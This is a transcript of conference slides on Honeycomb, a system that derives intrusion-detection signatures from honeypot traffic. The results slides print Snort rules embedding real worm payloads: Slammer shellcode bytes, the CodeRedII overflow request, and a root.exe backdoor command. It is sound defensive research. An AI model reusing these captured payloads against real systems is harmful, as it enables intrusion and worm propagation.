Honeycomb Automated IDS Signature Generation using Honeypots Christian Kreibich Jon Crowcroft.

Honeycomb Automated IDS Signature Generation using Honeypots Christian Kreibich Jon Crowcroft

Motivation  We’d like to characterize suspicious traffic  IDS signatures are a way to do this  How to focus on relevant traffic? (Evil Bit )  Honeypots have no production value  Their traffic is suspicious by definition  Thus: look for patterns in honeypot traffic

Honeycomb  Name? Nice double meaning...

Honeycomb  Name? Nice double meaning...  Combing for patterns in honeypot traffic

Honeycomb’s Architecture

Honeycomb’s Algorithm

Pattern Detection (I)  Stream reassembly:

Pattern Detection (II)  Longest-common-substring (LCS) on pairs of messages: m 1 : fetaramasalatapatata m 2 : insalataramoussaka  Can be done in O(|m 1 | + |m 2 |) using suffix trees  Implemented libstree, generic suffix tree library  No hardcoded protocol-specific knowledge

Pattern Detection (III)  Horizontal detection:  LCS on pairs of messages  each message independent  e.g. (persistent) HTTP

Pattern Detection (IV)  Vertical detection:  concatenates incoming messages  LCS on pairs of strings  for interactive flows and to mask TCP dynamics  e.g. FTP, Telnet,...

Signature Pool  Limited-size queue of current signatures  Relational operators on signatures:  sig 1 = sig 2 : all elements equal  sig 1  sig 2 : elements differ  sig 1  sig 2 : sig 1 contains subset of sig 2 ’s facts  sig new = sig pool : sig new ignored  sig new  sig pool : sig new added  sig new  sig pool : sig new added  sig pool  sig new : sig new augments sig pool  Aggregation on destination ports

Results  We ran Honeycomb on an unfiltered cable modem connection for three days  Honeyd setup:  fake FTP, Telnet, SMTP, HTTP services, all Perl/Shell scripts.  Other ports: traffic sinks  Some statistics:  649 TCP connections, 123 UDP connections  Full traffic volume: ~1MB  approx. 30 signatures created  No wide-range portscanning

TCP Connections HTTP Kuang2 Virus/Trojan SMB NetBIOS Microsoft SQL Server

UDP Connections NetBIOS Messenger Service Slammer

Signatures created: Slammer  Honeyd log:  2003-05-08-02:26:43.0385 udp(17) S 81.89.64.111 2943 192.168.169.2 1434 2003-05-08-02:27:43.0404 udp(17) E 81.89.64.111 2943 192.168.169.2 1434: 376 0 2003-05-08-09:58:38.0807 udp(17) S 216.164.19.162 1639 192.168.169.2 1434 2003-05-08-09:59:38.0813 udp(17) E 216.164.19.162 1639 192.168.169.2 1434: 376 0 2003-05-08-17:15:24.0072 udp(17) S 66.28.200.226 6745 192.168.169.2 1434 2003-05-08-17:16:24.0083 udp(17) E 66.28.200.226 6745 192.168.169.2 1434: 376 0  Signature:  alert udp any any -> 192.168.169.2/32 1434 (msg: "Honeycomb Thu May 8 09h58m38 2003 "; content: "|04 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 DC C9 B0|B|EB 0E 01 01 01 01 01 01 01|p|AE|B|01|p|AE|B|90 90 90 90 90 90 90 90|h|DC C9 B0|B|B8 01 01 01 01|1|C9 B1 18|P|E2 FD|5|01 01 01 05|P|89E5|Qh.dllhel32hkernQhounthickChGetTf|B9|llQh32.dhws2 f|B9|etQhsockf|B9|toQhsend|BE 18 10 AE|B|8D|E|D4|P|FF 16|P|8D|E|E0|P|8D|E|F0|P|FF 16|P|BE 10 10 AE|B|8B 1E 8B 03|=U|8B EC|Qt|05 BE 1C 10 AE|B|FF 16 FF D0|1|C9|QQP|81 F1 03 01 04 9B 81 F1 01 01 01 01|Q|8D|E|CC|P|8B|E|C0|P|FF 16|j|11|j|02|j|02 FF D0|P|8D|E|C4|P|8B|E|C0|P|FF 16 89 C6 09 DB 81 F3|<a|D9 FF 8B|E|B4 8D 0C|@|8D 14 88 C1 E2 04 01 C2 C1 E2 08|)|C2 8D 04 90 01 D8 89|E|B4|j|10 8D|E|B0|P1|C9|Qf|81 F1|x|01|Q|8D|E|03|P|8B|E|AC|P|FF D6 EB|"; )  Full worm detected

Signatures created: CodeRedII  Hit more than a dozen times  alert tcp 80.0.0.0/8 any -> 192.168.169.2/32 80 (msg: "Honeycomb Tue May 6 11h55m20 2003 "; flags: A; flow: established; content: "GET /default.ida?XXXXXXXXXXXXXXXXXXXXX  XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u90 90%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00= a HTTP/1.0|0D 0A|Content-type: text/xml|0A|Content-length: 3379 |0D 0A 0D 0A C8 C8 01 00|`|E8 03 00 00 00 CC EB FE|dg|FF|6|00 00|dg|89|&|00 00 E8 DF 02 00 00|h|04 01 00 00 8D 85|\|FE FF FF|P|FF|U|9C 8D 85|\|FE FF FF|P|FF|U|98 8B|@|10 8B 08 89 8D|X|FE FF FF FF|U|E4|=|04 04 00 00 0F 94 C1|=|04 08 00 00 0F 94 C5 0A CD 0F B6 C9 89 8D|T|FE FF FF 8B|u|08 81|~0|9A 02 00 00 0F 84 C4 00 00 00 C7|F0|9A 02 00 00 E8 0A 00 00 00|CodeRedII|00 8B 1C|$|FF|U|D8|f|0B C0 0F 95 85|8|FE FF FF C7 85|P|FE FF FF 01 00 00 00|j|00 8D 85|P|FE FF FF|P|8D 85|8|FE FF FF|P|8B|E|08 FF|p|08 FF 90 84 00 00 00 80 BD|8|FE FF FF 01|thS|FF|U|D4 FF|U|EC 01|E|84|i|BD|T|FE FF FF|,|01 00 00 81 C7|,|01 00 00 E8 D2 04 00 00 F7 D0 0F AF C7 89|F4|8D|E|88|Pj|00 FF|u|08 E8 05 00 00 00 E9 01 FF FF FF|j|00|j|00 FF|U|F0|P|FF|U|D0|Ou|D2 E8|;|05 00 00|i|BD|T|FE FF FF 00|\&|05 81 C7 00|\&|05|W|FF|U|E8|j|00|j|16 FF|U|8C|j|FF FF|U|E8 EB F9 8B|F4)E|84|jd|FF|U|E8 8D 85| |FE FF FF 83 F8 0A|s|C3|f|C7 85|p|FF FF FF 02 00|f|C7 85|r|FF FF …  Full worm due to vertical detection – server replies before all signature-relevant packets seen

Signatures detected: others …  alert tcp 64.201.104.2/32 any -> 192.168.169.2/32 1080,3128,4588,6588,8080 (msg: "Honeycomb Mon May 5 19h04m12 2003 "; flags: S; flow: stateless; )

Signatures detected: others …  alert tcp 64.201.104.2/32 any -> 192.168.169.2/32 1080,3128,4588,6588,8080 (msg: "Honeycomb Mon May 5 19h04m12 2003 "; flags: S; flow: stateless; )  alert udp 81.152.239.141/32 any -> 192.168.169.2/32 135 (msg: "Honeycomb Thu May 8 12h57m51 2003 "; content: "|15 00 00 00 00 00 00 00 15 00 00 00|YOUR EXTRA PAYCHEQUE|00 E1 04|x|0C 00 00 00 00 00 00 00 0C 00 00 00|80.4.124.41|00|#|01 00 00 00 00 00 00|#|01 00 00| Amazing Internet Product Sells Itself!|0D 0A|Resellers Wanted! GO TO..... www.Now4U2.co.uk"; )

Signatures detected: others …  alert tcp 64.201.104.2/32 any -> 192.168.169.2/32 1080,3128,4588,6588,8080 (msg: "Honeycomb Mon May 5 19h04m12 2003 "; flags: S; flow: stateless; )  alert udp 81.152.239.141/32 any -> 192.168.169.2/32 135 (msg: "Honeycomb Thu May 8 12h57m51 2003 "; content: "|15 00 00 00 00 00 00 00 15 00 00 00|YOUR EXTRA PAYCHEQUE|00 E1 04|x|0C 00 00 00 00 00 00 00 0C 00 00 00|80.4.124.41|00|#|01 00 00 00 00 00 00|#|01 00 00| Amazing Internet Product Sells Itself!|0D 0A|Resellers Wanted! GO TO..... www.Now4U2.co.uk"; )  alert tcp 80.4.218.53/32 any -> 192.168.169.2/32 80 (msg: "Honeycomb Thu May 8 07h27m33 2003 "; flags: PA; flow: established; content: "GET /scripts/root.exe?/c+dir HTTP/1.0|0D 0A|Host: www|0D 0A|Connnection: close|0D 0A 0D|"; )

Signature Usability  LCS blindly calculates longest substring: alert tcp any any -> 81.100.86.44/32 445 (msg: "Honeycomb Fri Jul 18 02h40m22 2003 "; flags: PA; flow: established; content: "|00 00 00 85 FF|SMBr|00 00 00 00 18|S|C8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 FF FE 00 00 00 00 00|b|00 02|PC NETWORK PROGRAM 1.0|00 02|LANMAN1.0|00 02|Windows for Workgroups 3.1a|00 02|LM1.2X002|00 02|LANMAN2.1|00 02|NT LM 0.12"; )  Generated signatures not necessary useful for everyday use

Signature Usability (II)  But this “distraction” can be interesting: alert tcp 62.219.50.70/32 any -> 147.237.72.91/32 80 (msg: "Honeycomb Sun Nov 9 19h03m09 2003 "; flags: A; flow: established; content: "F45dYN1pL3zRApBOj2WCKnO2hiH9UgFzTlLwkFg0OPehaFKCk1gYadTVTcrsHbcz5Gd4qg.9 4xMs7cRE0ivx8.GVNN3YK1yCn8AU8WnuJtrcsEyTtwrH2ivX.w5UvBFGTN8y56ISLjiDeCBxj QVfdZGRllRB9jOG5m70m9keYyNsW2g51WiGzsOY2MCkawAoxAMFsh3rwRLVBtqGLGiXsm9SIr sEF23jQ6nbJM3knX6AbQqfqMBEMxApEgnWqK4xq0ZmmRaWj84uNmyTD3ZBg1KUkXUaAlBEntz hFJIhpWfDaWefyBBf4WsBFzfCO.YFBHIzam2N9GrJhwSHc7vowkdGXXWuvdpqHJowhbLG6KvH ZVjoFkUXqwOaTTK22z0osT9cAR.mRBXmrtCwe5wViX9EWaGHgocWqviXkBbvYZuns5IrXQv28 kBDm4oMoWl7JLvzZ-Wd-18qj.jztV mDPNc0FHsv2N4U4qczZzBssfp6S.8W0Azj9R1wLkjpP Xjr9r8ZOmE7Jyq1-MET-2gW9ETIe tlqd39CjftUnszxCDDAZnsXZeuT1C3xDwefCHI344MF K45Fi4GrZRKHJWUkJkKW622tnCAqR3zRF.MxBrkNcfeVcDkv2fOE0PF8AUCfiewxcA4x1mu3n iSnlx1T-hRcb0l1Q983X8ANPFI8H4vM-TQ vhMkHsvN0nxsUrh9xBm.YZL6Nc300YNle4DGK FNz.8HIQ9ID8mRIGJSGzcPHaq7EXAo67nnkHWw58d4udtwsbrr7NN48v5zjKtBlpklHTTcqjY sKsVWDhqEzDqFMrplBvgHfnjtKUIsBQsLIKgEAu9vXH5tWu3ef4nPT.7Tz9i8pb3DyZBMyqAf 6TkYG5z.UUeZP5BrTTc2XFOY1xfRieOzb.5qgE1GyXMojMNWZqTuZKMWVzW8ZMNXx3ARaxpNC D-LB8oWxCtruMqb-mOuxR2NkMfZMFnLsIouUzQtGZ8RsY2NJEz."; )

Summary  System detects patterns in network traffic  Using honeypot traffic, the system creates useful signatures  Good at worm detection  Todo list  Ability to control LCS algorithm (whitelisting?)  Tests with higher traffic volume  Experiment with approximate matching  Better signature reporting scheme

Thanks!  Shoutouts: a13x hØ  No machines were harmed or compromised in the making of this presentation.  www.cl.cam.ac.uk/~cpk25/honeycomb/

Honeycomb Automated IDS Signature Generation using Honeypots Christian Kreibich Jon Crowcroft.

Similar presentations

Presentation on theme: "Honeycomb Automated IDS Signature Generation using Honeypots Christian Kreibich Jon Crowcroft."— Presentation transcript:

Similar presentations

About project

Feedback

Log in

Auth with social network:

Honeycomb Automated IDS Signature Generation using Honeypots Christian Kreibich Jon Crowcroft.

Similar presentations

Presentation on theme: "Honeycomb Automated IDS Signature Generation using Honeypots Christian Kreibich Jon Crowcroft."— Presentation transcript:

Similar presentations

About project

Feedback